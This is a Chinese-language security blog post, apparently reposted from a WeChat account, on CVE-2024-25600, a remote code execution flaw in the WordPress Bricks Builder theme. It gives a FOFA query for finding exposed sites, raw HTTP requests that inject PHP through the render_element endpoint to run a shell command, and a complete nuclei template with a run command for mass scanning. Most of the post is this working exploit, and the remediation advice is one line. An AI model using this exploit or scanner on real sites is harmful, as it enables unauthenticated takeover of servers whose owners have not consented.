CVE-2024-25600

admin 2024年2月23日09:20:30评论125 views字数 2969阅读9分53秒阅读模式

使

01

漏洞名称

WordPres Bricks Builder RCE漏洞

02

漏洞影响

Bricks Builder <= 1.9.6

03

漏洞描述

Bricks Builder是一款用于WordPress的开发主题,提供直观的拖放界面,用于设计和构建WordPress网站。WordPress配置安装的Brick Builder主题在低于<= 1.9.6版本中存在远程代码执行漏洞。

04

FOFA搜索语句
body="/wp-content/themes/bricks/"

CVE-2024-25600

05

漏洞复现

第一步,获取网站的nonce值

GET / HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36Connection: closeAccept-Encoding: gzip

CVE-2024-25600

第二步,向靶场发送如下数据包执行id命令

POST /wp-json/bricks/v1/render_element HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36Connection: closeContent-Length: 356Content-Type: application/jsonAccept-Encoding: gzip{  "postId": "1",  "nonce": "第一步获得的值",  "element": {    "name": "container",    "settings": {      "hasLoop": "true",      "query": {        "useQueryEditor": true,        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",        "objectType": "post"      }    }  }}

CVE-2024-25600

漏洞复现成功

06

批量扫描脚本

nuclei poc文件内容如下

id: CVE-2024-25600info:  name: Unauthenticated Remote Code ExecutionBricks <= 1.9.6  author: christbowel  severity: critical  description: |    Bricks Builder is a popular WordPress development theme with approximately 25,000 active installations. It provides an intuitive drag-and-drop interface for designing and building WordPress websites. Bricks <= 1.9.6 is vulnerable to unauthenticated remote code execution (RCE) which means that anybody can run arbitrary commands and take over the site/server. This can lead to various malicious activities  reference:    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25600    - https://wpscan.com/vulnerability/afea4f8c-4d45-4cc0-8eb7-6fa6748158bd/    - https://snicco.io/vulnerability-disclosure/bricks/unauthenticated-rce-in-bricks-1-9-6    - https://github.com/Chocapikk/CVE-2024-25600    - https://op-c.net/blog/cve-2024-25600-wordpresss-bricks-builder-rce-flaw-under-active-exploitation  metadata:    publicwww-query: "/wp-content/themes/bricks/"    verified: true    max-request: 2  tags: cve,cve2024,wpscan,wordpress,wp-plugin,wp,bricks,rcehttp:  - raw:      - |        GET / HTTP/1.1        Host: {{Hostname}}      - |        POST /wp-json/bricks/v1/render_element HTTP/1.1        Host: {{Hostname}}        Content-Type: application/json        {          "postId": "1",          "nonce": "{{nonce}}",          "element": {            "name": "container",            "settings": {              "hasLoop": "true",              "query": {                "useQueryEditor": true,                "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",                "objectType": "post"              }            }          }        }    matchers-condition: and    matchers:      - type: regex        part: body        regex:          - "Exception:"          - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"        condition: and    extractors:      - type: regex        name: nonce        part: body        group: 1        regex:          - 'nonce":"([0-9a-z]+)'        internal: true# digest: 4a0a0047304502200825dcce3678d271573926754136ccd219fed98b4224e0d037ae0df099af337c022100ad0aff9a59a433275ece8b3ba693d51b7c10de39801f51c9256acefb4de536e5:922c64590222798bb761d5b6d8e72950

运行POC

nuclei.exe -l data/CVE-2024-25600.txt -t mypoc/cve/CVE-2024-25600.yaml

CVE-2024-25600

07

修复建议

升级到最新版本。

08

新粉丝

原文始发于微信公众号(AI与网安):CVE-2024-25600

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月23日09:20:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-25600http://cn-sec.com/archives/2518248.html

发表评论

匿名网友 填写信息